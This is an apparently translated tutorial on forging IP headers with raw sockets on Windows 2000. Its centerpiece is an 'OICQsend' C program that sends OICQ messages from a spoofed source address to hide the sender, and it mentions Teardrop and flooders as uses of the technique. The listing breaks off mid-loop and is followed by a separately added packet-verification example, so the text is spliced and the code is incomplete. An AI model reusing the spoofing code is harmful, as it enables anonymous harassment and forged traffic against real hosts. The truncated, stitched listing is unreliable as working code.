Implementing Custom IP Headers in Windows 2000, with the Complete OICQsend Example

zhaozj2021-02-08  223

Lonely swordsman

E-mail: Janker@371.net homepage: http://janker.126.com

First, Introduction

Not long ago I wrote the "Personal Internet User Self-Protection Manual", which described in detail how to build a secure personal system and what to watch out for when online, with the aim of helping ordinary Internet users learn to protect themselves. In it I mentioned the problem of hiding one's IP address, but since that article was written for general users I did not go into detail. I did not expect so many readers to be interested, and several wrote to me to discuss it, so I have written this follow-up article and dedicate it to everyone.

Second, IP Header Structure

We know that all TCP/IP network data is transmitted in IP packets: the data to be sent is packaged into an IP datagram consisting of an IP header and the data. In general, network software always generates IP headers made up of a whole number of 32-bit words, padding the header with extra zeros where necessary. The IP header contains all the information needed to deliver the data carried in the IP packet. The data structure and description of the IP header are as follows:

| Member | Length (bits) | Description |
|---|---|---|
| Version | 4 | Version number of the IP header; currently IPv4, the newest is IPv6 |
| Header Length | 4 | Length of the IP header; if there are no special options, the IP header is always 20 bytes long |
| Type of Service | 8 | Service type; defines the priority, delay, throughput and reliability of the transmission |
| Total Packet Length | 16 | Total length of the IP packet; if there are no special options, generally 20 bytes long |
| Identification | 16 | IP packet identifier; the host uses it to uniquely identify each datagram it sends |
| Flag | 3 | IP data fragmentation flags |
| Fragment Offset | 13 | IP data fragmentation offset |
| Time To Live | 8 | Lifetime of the datagram on the network; each router it passes through decrements this value by one |
| Protocol | 8 | TCP/IP protocol type, e.g. ICMP is 1, IGMP is 2, TCP is 6, UDP is 17 |
| Header Checksum | 16 | Header checksum |
| Source IP Address | 32 | Source IP address |
| Destination IP Address | 32 | Destination IP address |
| Other | ? | Other options |
| Data | ? | Data |

Implementing your own IP header is a very meaningful thing. For example, by changing the priority in the TOS field and the TTL of the IP header you can give your own packets stronger transmission capability and a longer lifetime, and by modifying the source IP address in the IP header you can hide the IP address of your own machine, and so on. The famous attack program Teardrop works by deliberately constructing fragmented IP packets that the system cannot handle, and SYN Flooder and UDP Flooder work by generating random, spoofed source IP addresses.

Third, Implementation Principle

In general, custom IP headers are implemented with the IP_HDRINCL option of the socket library function setsockopt(). This is easy to do on UNIX and Linux platforms, but unfortunately the Winsock 1.1 and Winsock 2.0 libraries on Windows platforms do not support the IP_HDRINCL option of setsockopt(), so on Windows 9x/NT custom IP headers cannot be implemented from the Winsock library. They can of course be implemented by writing a virtual device driver, but that is rather complicated. The appearance of Windows 2000 changes this situation: the Winsock 2.2 library of Windows 2000 fully supports the IP_HDRINCL option of setsockopt(), so we can easily implement custom IP headers. The implementation method is as follows:

```c
SOCKET s;
BOOL   bOpt;
int    ret;

/* Raw socket; with IP_HDRINCL the application supplies the IP header itself */
s = WSASocket(AF_INET, SOCK_RAW, IPPROTO_UDP, NULL, 0, WSA_FLAG_OVERLAPPED);
bOpt = TRUE;
ret = setsockopt(s, IPPROTO_IP, IP_HDRINCL, (char *)&bOpt, sizeof(bOpt));
```

Fourth, Example

To help everyone learn to construct their own IP header data as quickly as possible, here is a complete example. Its function is: given only the other party's IP address, it sends that party a "hello!" OICQ message, and because the IP header of the sent packet has been modified, the sender's IP address is completely hidden. In other words, you can build a fully anonymous OICQ sender; of course, if it is done intentionally, the consequences. The source code is as follows:

```c
/***********************************************************************/
/* OICQSEND.C                                                          */
/* This program was compiled with Visual C++ 6.0 and debugged on       */
/* Windows 2000 Advanced Server                                        */
/* created by janker@371.net 2000.8.28                                 */
/* Declaration: this program can be modified at will into an attack    */
/* program; use it at your own risk                                    */
/***********************************************************************/

#pragma pack(1)
#define WIN32_LEAN_AND_MEAN
#include <winsock2.h>
#include <windows.h>
#include <stdio.h>
#include <stdlib.h>
#include <time.h>

#define OICQ_MAX_PACKET 1024
#define OICQ_MAX_MSG    512
#define OICQ_MSG_LEN    45
#define SRC_IP          "127.0.0.1"
#define SRC_PORT        5277
#define DST_PORT        4000

typedef struct ip_hdr {
    unsigned char  ip_verlen;       /* version (4 bits) and header length (4 bits) */
    unsigned char  ip_tos;          /* type of service */
    unsigned short ip_totallength;  /* total length of the packet */
    unsigned short ip_id;           /* identification */
    unsigned short ip_offset;       /* flags and fragment offset */
    unsigned char  ip_ttl;          /* time to live */
    unsigned char  ip_protocol;     /* protocol (UDP = 0x11) */
    unsigned short ip_checksum;     /* header checksum */
    unsigned int   ip_srcaddr;      /* source address */
    unsigned int   ip_destaddr;     /* destination address */
} IP_HDR;

typedef struct udp_hdr {
    unsigned short src_portno;
    unsigned short dst_portno;
    unsigned short udp_length;
    unsigned short udp_checksum;
} UDP_HDR;

/* OICQ "hello!" message body; the remaining bytes of the array are zero */
char strMessage[OICQ_MSG_LEN] = {
    0x02, 0x01, 0x07, 0x00, 0x78, 0x00, 0x00, 0x31, 0x30, 0x30, 0x30, 0x1f,
    0x30, 0x30, 0x1f, 0x32, 0x30, 0x30, 0x30, 0x2d, 0x30, 0x31, 0x2d, 0x30,
    0x31, 0x1f, 0x30, 0x30, 0x3a, 0x30, 0x30, 0x1f, 0x68, 0x65, 0x6c, 0x6c,
    0x6f, 0x21, 0x03 };

/* Standard Internet (one's-complement) checksum */
USHORT checksum(USHORT *buffer, int size)
{
    unsigned long cksum = 0;
    while (size > 1) {
        cksum += *buffer++;
        size  -= sizeof(USHORT);
    }
    if (size) {
        cksum += *(UCHAR *)buffer;
    }
    cksum  = (cksum >> 16) + (cksum & 0xffff);
    cksum += (cksum >> 16);
    return (USHORT)(~cksum);
}

int main(int argc, char **argv)
{
    WSADATA            wsd;
    SOCKET             s;
    BOOL               bOpt;
    struct sockaddr_in remote;
    IP_HDR             iphdr;
    UDP_HDR            udphdr;
    int                ret;
    DWORD              i;
    unsigned short     iTotalSize, iUdpSize, iUdpChecksumSize, iIPVersion, iIPSize, cksum = 0;
    char               buf[OICQ_MAX_PACKET], *ptr = NULL;

    printf("Spoof OICQ MSG Sender - by Janker@371.NET\n\n");
    if (argc != 2) {
        printf("usage: oicqsend destination_ip_address\n");
        ExitProcess(1);
    }
    srand(time(NULL));
    strMessage[5] = rand();     /* randomise the message sequence byte */

    if (WSAStartup(MAKEWORD(2, 2), &wsd) != 0) {
        printf("WSAStartup() failed: %d\n", GetLastError());
        return -1;
    }
    s = WSASocket(AF_INET, SOCK_RAW, IPPROTO_UDP, NULL, 0, 0);
    if (s == INVALID_SOCKET) {
        printf("WSASocket() failed: %d\n", WSAGetLastError());
        return -1;
    }
    bOpt = TRUE;
    ret = setsockopt(s, IPPROTO_IP, IP_HDRINCL, (char *)&bOpt, sizeof(bOpt));
    if (ret == SOCKET_ERROR) {
        printf("setsockopt(IP_HDRINCL) failed: %d\n", WSAGetLastError());
        return -1;
    }

    /* Fill in the IP header */
    iTotalSize = sizeof(iphdr) + sizeof(udphdr) + OICQ_MSG_LEN;
    iIPVersion = 4;
    iIPSize    = sizeof(iphdr) / sizeof(unsigned long);
    iphdr.ip_verlen      = (iIPVersion << 4) | iIPSize;
    iphdr.ip_tos         = 0;
    iphdr.ip_totallength = htons(iTotalSize);
    iphdr.ip_id          = 0;
    iphdr.ip_offset      = 0;
    iphdr.ip_ttl         = 128;
    iphdr.ip_protocol    = 0x11;               /* UDP */
    iphdr.ip_checksum    = 0;
    iphdr.ip_srcaddr     = inet_addr(SRC_IP);  /* spoofed source address */
    iphdr.ip_destaddr    = inet_addr(argv[1]);

    /* Fill in the UDP header */
    iUdpSize = sizeof(udphdr) + OICQ_MSG_LEN;
    udphdr.src_portno   = htons(SRC_PORT);
    udphdr.dst_portno   = htons(DST_PORT);
    udphdr.udp_length   = htons(iUdpSize);
    udphdr.udp_checksum = 0;

    /* Build the UDP pseudo-header in buf: source address, destination address,
       a zero byte, the protocol, the UDP length, then the UDP header itself */
    iUdpChecksumSize = 0;
    ptr = buf;
    ZeroMemory(buf, OICQ_MAX_PACKET);
    memcpy(ptr, &iphdr.ip_srcaddr, sizeof(iphdr.ip_srcaddr));
    ptr += sizeof(iphdr.ip_srcaddr);
    iUdpChecksumSize += sizeof(iphdr.ip_srcaddr);
    memcpy(ptr, &iphdr.ip_destaddr, sizeof(iphdr.ip_destaddr));
    ptr += sizeof(iphdr.ip_destaddr);
    iUdpChecksumSize += sizeof(iphdr.ip_destaddr);
    ptr++;
    iUdpChecksumSize += 1;
    memcpy(ptr, &iphdr.ip_protocol, sizeof(iphdr.ip_protocol));
    ptr += sizeof(iphdr.ip_protocol);
    iUdpChecksumSize += sizeof(iphdr.ip_protocol);
    memcpy(ptr, &udphdr.udp_length, sizeof(udphdr.udp_length));
    ptr += sizeof(udphdr.udp_length);
    iUdpChecksumSize += sizeof(udphdr.udp_length);
    memcpy(ptr, &udphdr, sizeof(udphdr));
    ptr += sizeof(udphdr);
    iUdpChecksumSize += sizeof(udphdr);
    for (i = 0; i
```
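As an added example that is not part of the original article, the following C code builds one IPv4/UDP datagram with the same 20-byte header layout and one's-complement checksum as the listing above, and then verifies it the way a receiver or packet sniffer would: header checksum, total length, UDP pseudo-header checksum, and a martian-source check that rejects a 127/8 source address, which is exactly what the listing's SRC_IP of 127.0.0.1 would trigger at any host that receives it from the network. Nothing is sent; the sample packet, addresses and message are constructed here.

```c
/* Added example (not the article's code): build one IPv4/UDP datagram with the 20-byte header
 * layout from the table above, then verify it as a receiver would. Sample data is constructed. */
#include <stdint.h>
#include <string.h>
enum { PKT_OK = 0, PKT_BAD_HDR, PKT_BAD_IPCSUM, PKT_BAD_UDPCSUM, PKT_MARTIAN_SRC };   /* verdicts */
static void put16(uint8_t *p, uint16_t v) { p[0] = (uint8_t)(v >> 8); p[1] = (uint8_t)v; }  /* network order */
static uint16_t get16(const uint8_t *p) { return (uint16_t)((p[0] << 8) | p[1]); }

/* RFC 1071 one's-complement checksum, the same algorithm as the article's checksum() */
uint16_t checksum(const uint8_t *data, size_t size) {
    uint32_t sum = 0; size_t i;
    for (i = 0; i + 1 < size; i += 2) sum += (uint32_t)((data[i] << 8) | data[i + 1]);
    if (size & 1) sum += (uint32_t)data[size - 1] << 8;             /* odd trailing byte, zero padded */
    sum = (sum >> 16) + (sum & 0xffff); sum += sum >> 16;           /* fold the carries back in */
    return (uint16_t)~sum;
}

/* UDP checksum covers a 12-byte pseudo-header (src, dst, 0, protocol 17, UDP length) + segment */
static uint16_t udp_checksum(const uint8_t *ip, const uint8_t *seg, size_t seglen) {
    uint8_t buf[12 + 1500];
    memcpy(buf, ip + 12, 8); buf[8] = 0; buf[9] = 17; put16(buf + 10, (uint16_t)seglen);
    memcpy(buf + 12, seg, seglen);
    return checksum(buf, 12 + seglen);
}

/* Constructed sample: src:5277 -> dst:4000 carrying msg, with the field values of the listing */
size_t build_sample(uint8_t *out, const uint8_t src[4], const uint8_t dst[4], const char *msg) {
    size_t mlen = strlen(msg), udplen = 8 + mlen, total = 20 + udplen; uint16_t c;
    if (mlen > 1492) return 0;                                      /* keep within one 1500-byte datagram */
    memset(out, 0, total);
    out[0] = 0x45; out[8] = 128; out[9] = 17;                       /* IPv4, IHL 5, TTL 128, UDP */
    put16(out + 2, (uint16_t)total); memcpy(out + 12, src, 4); memcpy(out + 16, dst, 4);
    put16(out + 20, 5277); put16(out + 22, 4000); put16(out + 24, (uint16_t)udplen);
    memcpy(out + 28, msg, mlen);
    c = udp_checksum(out, out + 20, udplen); put16(out + 26, c ? c : 0xffff); /* RFC 768: 0 = none */
    put16(out + 10, checksum(out, 20));                             /* header checksum goes in last */
    return total;
}

/* The checks a defender's parser applies to a packet taken off the wire */
int verify_ipv4_udp(const uint8_t *pkt, size_t len) {
    size_t udplen;
    if (len < 28 || len > 1520 || pkt[0] != 0x45 || pkt[9] != 17) return PKT_BAD_HDR; /* IPv4, no options, UDP */
    if (get16(pkt + 2) != len) return PKT_BAD_HDR;                  /* total length must match what arrived */
    if (checksum(pkt, 20) != 0) return PKT_BAD_IPCSUM;              /* a valid header sums to zero */
    if (pkt[12] == 127) return PKT_MARTIAN_SRC;                     /* 127/8 source cannot arrive from the net */
    if ((udplen = get16(pkt + 24)) < 8 || udplen != len - 20) return PKT_BAD_HDR;
    if (get16(pkt + 26) != 0 && udp_checksum(pkt, pkt + 20, udplen) != 0) return PKT_BAD_UDPCSUM;
    return PKT_OK;
}
```

Tampering with any byte after the checksums are filled in (payload, TTL) is caught by the corresponding checksum, while the loopback-source packet passes both checksums and is caught only by the martian check, which is why ingress filtering must look at addresses and not just integrity.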

Fifth, Afterword

The OICQ packet data used in this article's example was captured with the Network Monitor of Windows 2000, which is a good network packet analysis tool; I hope everyone will make use of it.

